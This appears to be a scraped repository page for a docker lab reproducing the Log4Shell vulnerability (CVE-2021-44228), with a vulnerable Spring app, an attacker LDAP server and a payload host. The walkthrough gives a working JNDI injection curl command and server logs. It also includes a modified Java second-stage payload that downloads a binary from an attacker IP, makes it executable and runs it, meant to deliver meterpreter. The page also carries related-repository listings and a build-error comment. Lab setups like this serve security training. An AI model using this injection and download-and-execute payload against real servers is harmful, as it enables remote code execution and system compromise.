Log4shell docker lab using christophetd's vulnerable app and mbechler's marshalsec

ChoI

Last update: Nov 17, 2022

Related tags

Spring Boot log4shell-dockerlab

Overview

log4shell-dockerlab

Credits

All credits goes to the original authors. I just git-cloned and created a docker-compose file, that's all.

Description

This repository contains a docker-compose setup which starts an attacker LDAP server and a victim web server that is vulnerable to log4shell (CVE-2021-44228).

Components

Victim Web server - log4shell-vulnerable-app: A web server with log4j, vulnerable to first stage payload, which is the log4shell attack.

Attacker LDAP sever - marshalsec: A LDAP server that receives jndi request from the victim web server. Redirects the victim web server to attacker web server.

Attacker Web server: A python3 -m http.server server which hosts the second stage payload, which is the Exploit.class.

Usage

Start the victim web server and the attacker ldap server

docker-compose up --build

Prepare the second stage payload. The port 8888 is hardcoded. To change this, modify ./marshalsec/Dockerfile.

cd ./attacker-webserver
python3 -m http.server 8888

Attack

// Attack with log4shell payload 
└─# curl <your-vm-ip>:8080 -H 'X-Api-Version: ${jndi:ldap://<your-vm-ip>:1389/Exploit}'    

Hello, world!

// Docker-compose's LDAP server replying to JNDI & victim web server downloading Exploit.class from the attacker web server 
log4shell-dockerlab-targetweb-1  |
log4shell-dockerlab-jndi-1       | Send LDAP reference result for Exploit redirecting to http://172.17.0.1:8888/Exploit.class
log4shell-dockerlab-targetweb-1  | 2021-12-12 05:01:44,345 http-nio-8080-exec-7 WARN Error looking up JNDI resource [ldap://192.168.40.128:1389/Exploit]. javax.naming.NamingException: problem generating object using object factory [Root exception is java.lang.ClassCastException: Exploit cannot be cast to javax.naming.spi.ObjectFactory]; remaining name 'Exploit'
log4shell-dockerlab-targetweb-1  |      at com.sun.jndi.ldap.LdapCtx.c_lookup(LdapCtx.java:1092)

// Attacker's web server sending second stage payload to the victim web server. This will get executed.
└─# python3 -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...
172.20.0.3 - - [12/Dec/2021 00:01:44] "GET /Exploit.class HTTP/1.1" 200 -

Check the attack poc

// Check docker ps and find out container ID of the "targetweb"
└─# docker ps
CONTAINER ID   IMAGE                           COMMAND                  CREATED             STATUS          PORTS                                       NAMES
1131d694c91a   log4shell-dockerlab_jndi        "/usr/local/bin/mvn-…"   51 minutes ago      Up 51 minutes   0.0.0.0:1389->1389/tcp, :::1389->1389/tcp   log4shell-dockerlab-jndi-1
a2217b3781ad   log4shell-dockerlab_targetweb   "java -jar /app/spri…" 


// Check /tmp and validate the POC have worked 
└─# docker exec a2217b3781ad ls /tmp
hsperfdata_root
log4shell-pwned

Usage - Modified Payload

Instead of the Exploit.java POC, you can modify the payload.

Install JDK if you don't have one

apt install -y default-jdk

Modify the PoC. For example, you can test with a metasploit's multi/script/web_delivery.

// Modified PoC to ship meterpreter instead of the original echo pwned > /tmp/log4shell-pwned payload. 

public class Rev {
    public Rev() {}
    static {
        try {
            String[] cmds = System.getProperty("os.name").toLowerCase().contains("win")
                    ? new String[]{"cmd.exe","/c", "calc.exe"}
                    : new String[]{"sh","-c", "wget -qO PqhJT1H2 --no-check-certificate http://192.168.40.128:7777/mhjfufvGzrRws; chmod +x PqhJT1H2; ./PqhJT1H2& disown"};
            java.lang.Runtime.getRuntime().exec(cmds).waitFor();
        }catch (Exception e){
            e.printStackTrace();
        }
    }
    public static void main(String[] args) {
        Rev e = new Rev();
    }
}

Compile the second stage. Make sure to target JDK 8, since the log4shell-vulnerable-app was built on JDK 8.

// Compile with JDK 8
javac --release 8 <your-payload>.java 

// Sanity check and make sure it's version 52.0 (jdk 8)
└─# file Rev.class
Rev.class: compiled Java class data, version 52.0 (Java 1.8)

Host the file, and attack again

python3 -m http.server 8888 
curl <your-vm-ip>:8080 -H 'X-Api-Version: ${jndi:ldap://<your-vm-ip>:1389/Exploit}'
ex) curl 192.168.40.128:8080 -H 'X-Api-Version: ${jndi:ldap://192.168.40.128:1389/Exploit}'

References

https://www.lunasec.io/docs/blog/log4j-zero-day/

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228

https://github.com/christophetd/log4shell-vulnerable-app

https://github.com/mbechler/marshalsec

https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce

With react-native-update-in-app library you can easily implement in-app updates in your React Native app using CDN or any other file server

React Native In-App update With react-native-update-in-app library you can easily implement in-app updates in your React Native app using CDN or any o

Dec 21, 2022

log4j-scanner is a project derived from other members of the open-source community by CISA's Rapid Action Force team to help organizations identify potentially vulnerable web services affected by the log4j vulnerabilities.

Log4j Scanner This repository provides a scanning solution for the log4j Remote Code Execution vulnerabilities (CVE-2021-44228 & CVE-2021-45046). The

Dec 22, 2022

Super simple deploy using spring boot, docker, k8s and kind

Target Target of this repository is show how to build spring boot application Docker image and deploy it with kind and k8s at least in local. Prerequi

Aug 22, 2021

This repo contains all the materials for placement as well as Practical lab codes for all subjects and notes. For students graduating in 2023

UEMK_PLACEMENT_2023 This repo contains all the materials for placement as well as Practical lab codes for all subjects and notes. For students graduat

Mar 5, 2022

Comments

Error when running docker-compose up --build
I am running sudo docker-compose up --build. The build fails with the following error.

Step 4/9 : RUN gradle bootJar --no-daemon ---> Running in 6babbb1e881d

Welcome to Gradle 7.3.1!

Here are the highlights of this release:

Easily declare new test suites in Java projects

Support for Java 17

Support for Scala 3

For more details see https://docs.gradle.org/7.3.1/release-notes.html

To honour the JVM settings for this build a single-use Daemon process will be forked. See https://docs.gradle.org/7.3.1/userguide/gradle_daemon.html#sec:disabling_the_daemon. Daemon will be stopped at the end of the build

FAILURE: Build failed with an exception.

Where: Build file '/home/gradle/src/build.gradle' line: 2

What went wrong: Plugin [id: 'org.springframework.boot', version: '2.6.1'] was not found in any of the following sources:

Gradle Core Plugins (plugin is not in 'org.gradle' namespace)

Plugin Repositories (could not resolve plugin artifact 'org.springframework.boot:org.springframework.boot.gradle.plugin:2.6.1') Searched in the following repositories: Gradle Central Plugin Repository

Try:

Run with --stacktrace option to get the stack trace. Run with --info or --debug option to get more log output. Run with --scan to get full insights.

Get more help at https://help.gradle.org

BUILD FAILED in 9s ERROR: Service 'targetweb' failed to build: The command '/bin/sh -c gradle bootJar --no-daemon' returned a non-zero code: 1

Running on Ubuntu 20.04 with a fresh install of Docker and Docker-compose.

Please advise.
opened by Dave-0-0 2

Log4shell docker lab using christophetd's vulnerable app and mbechler's marshalsec

Related tags

Overview

log4shell-dockerlab

Credits

Description

Components

Usage

Usage - Modified Payload

References

You might also like...

With react-native-update-in-app library you can easily implement in-app updates in your React Native app using CDN or any other file server

log4j-scanner is a project derived from other members of the open-source community by CISA's Rapid Action Force team to help organizations identify potentially vulnerable web services affected by the log4j vulnerabilities.

Super simple deploy using spring boot, docker, k8s and kind

This repo contains all the materials for placement as well as Practical lab codes for all subjects and notes. For students graduating in 2023

Spring-boot project using open-api, docker, maven, REST

Source for the SpringOne 2021 Knative + Tekton lab

Projeto de LAB: Conhendo o projeto Spring data JPA com Java na prática

Lab "Criando um Banco Digital com Java e Orientação a Objetos".

F5 BIG-IP iControl REST vulnerability RCE exploit with Java including a testing LAB

Comments

Error when running docker-compose up --build

Owner

ChoI

Spring 2019-2020 Java Programming course lab -- Chongqing University. Include my source codes and lab reports.

Spring Boot web application vulnerable to CVE-2021-44228, nicknamed Log4Shell.

CSL304: OOPM (Java) Lab [OOPM Lab]

Deploying Spring Boot and MongoDB as Containers Using Docker and Docker Compose

Spring Boot Log4j - CVE-2021-44228 Docker Lab

Logout4Shell - Use Log4Shell vulnerability to vaccinate a victim server against Log4Shell

8INF138-TP3-SECURITY-DOCKER - Le docker du tp3 du cours 8INF138 de l'UQAC

消息推送平台 - 所使用的技术栈包括：SpringBoot、SpringDataJPA、MySQL、Docker、docker-compose、Kafka、Redis、Apollo、prometheus、Grafana、GrayLog等等

The Spring Boot Sample App on K8S has been implemented using GKE K8S Cluster, Spring Boot, Maven, and Docker.

An assistance platform made using Spring framework that analyses your code, and helps you either to start a devops project, or to turn an existing project into a devops project using open source software (Git, Docker, Jenkins..)